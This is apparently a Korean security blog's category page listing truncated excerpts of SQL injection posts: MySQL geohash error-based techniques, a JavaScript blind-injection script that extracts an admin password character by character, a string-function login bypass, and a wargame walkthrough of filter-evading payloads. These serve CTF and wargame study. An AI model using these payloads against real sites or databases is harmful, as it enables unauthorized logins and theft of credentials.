SQL Injection4 New Error Based SQL Injection in MySQL >= 5.7.5 1. ST_LatFromGeoHash()mysql> select ST_LatFromGeoHash(version());-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function ST_LATFROMGEOHASH 2. ST_LongFromGeoHash()mysql> select ST_LongFromGeoHash(version());-> ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-community' for function ST_LONGFROMGEOHASH 3. ST_PointFromGeoHash()mysql> select ST_PointFromGeoHash(version(),0);.. 2015. 4. 5. XMLHttpRequest 를 이용한 Blind SQL Injection 소스 [GET]flag = ""function run(i,j){var req = new XMLHttpRequest();req.open('GET', '/pytest/get_ok.php?id=admin\' and ascii(substr(pw,'+i+',1))='+j+'%23&pw=1');req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');req.send();req.onreadystatechange = function() {if(req.readyState == 4 && req.status == 200){if(req.responseText.indexOf("Login failed") == -1){ // 해당문자열이 없을 시flag += S.. 2015. 3. 27. 문자열함수를 이용한 SQL Injection 최근 대회 Write-Up들을 둘러보다가 알게된 기법에 대해 글을 쓰려고 한다.먼저 테이블의 구성은 아래와 같다.(문제의 환경은 대부분의 함수가 필터링되고 admin으로 로그인을 하는 것이다.) member 테이블 id pw guest guest123 test test123 adminadmin123 SELECT ascii(id) FROM member;->ascii(id) 103 116 97 전체의 id에 대해 ascii 변환을 시도하면 id의 첫번째 부분들만 ascii변환이 진행된다.이를 통해 아래와 같은 쿼리를 통해 admin으로 로그인을 시도할 수 있다.(파란 부분이 사용자의 입력이 들어간 부분) SELECT * FROM member where id='' or ascii(id)-103&ascii(id.. 2015. 1. 29. itchy's Funny injection 풀이 총 9단계로 이뤄진 간단한 SQL Injection 워게임 사이트이다. (http://itchy.dothome.co.kr) 단계별로 올라갈수록 필터링이 하나하나 추가되는 방식이며 아래의 페이로드 말고도 다른 방법들이 충분히 존재할 수 있으므로 시험끝나고 다시 한번 풀어봐야겠다. Stage 1. id=admin'%23&pw=a Stage 2. id에 # 와 -- 에 대한 필터링 추가) id=admin' or '=&pw=a Stage 3. id와 pw 모두 and 와 or 에 대한 필터링 추가) id=admin'||'=&pw=a Stage 4. id와 pw 모두 admin , 공백에 대한 필터링 추가) id=ad'%0d'min&pw='1=1%23 id='||id%0dlike%0d'adm%'/*&pw=*/%2.. 2014. 6. 18. 이전 1 다음